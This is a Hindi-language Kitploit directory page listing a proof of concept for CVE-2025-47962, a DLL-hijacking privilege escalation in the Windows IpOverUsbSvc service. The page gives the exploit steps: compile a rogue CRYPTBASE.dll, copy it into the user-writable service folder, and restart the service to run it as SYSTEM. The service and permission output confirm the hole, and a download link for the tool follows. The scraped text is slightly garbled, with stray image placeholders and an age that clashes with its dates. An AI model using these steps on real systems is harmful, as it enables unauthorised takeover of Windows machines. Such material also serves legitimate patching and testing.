Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-47962-POC — CVE-2025-47962 के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो Windows IpOverUsbSvc सेवा में असुरक्षित निर्देशिका अनुमतियों के कारण DLL हाईजैकिंग के माध्यम से स्थानीय विशेषाधिकार वृद्धि का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/q1uf3ng/cve-2025-47962-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपार्श्व आंदोलनबाइनरी शोषण
GitHubq1uf3ng/cve-2025-47962-poc

CVE-2025-47962-POC

CVE-2025-47962 के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो Windows IpOverUsbSvc सेवा में असुरक्षित निर्देशिका अनुमतियों के कारण DLL हाईजैकिंग के माध्यम से स्थानीय विशेषाधिकार वृद्धि का प्रदर्शन करता है।

रिपॉजिटरी देखें
47 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-47962-POC

प्रजनन प्रक्रिया: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32

copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"

net stop IpOverUsbSvc net start IpOverUsbSvc 图片

स्पष्टीकरण: IpOverUsbSvc

root@kitploit:~
sc.exe qc IpOverUsbSvc

SERVICE_NAME: IpOverUsbSvc
TYPE               : 10  WIN32_OWN_PROCESS
START_TYPE         : 2   AUTO_START
BINARY_PATH_NAME   : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem

LocalSystem विशेषाधिकारों के साथ चलता है। निष्पादन योग्य फ़ाइल C:\Microsoft Shared\ निर्देशिका में स्थित है, जिस पर सामान्य उपयोगकर्ताओं के पास पूर्ण नियंत्रण अनुमतियाँ हैं। यह पाया गया है कि सामान्य उपयोगकर्ता SYSTEM सेवा निर्देशिका में फ़ाइलें लिख सकते हैं। फिर DLL की निगरानी करें 图片 图片 图片

Windows SDK स्थापना के दौरान बनाई गई C:\Microsoft Shared\ निर्देशिका की अनुमतियाँ गलत तरीके से कॉन्फ़िगर की गई हैं:

root@kitploit:~
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
टूल डाउनलोड करें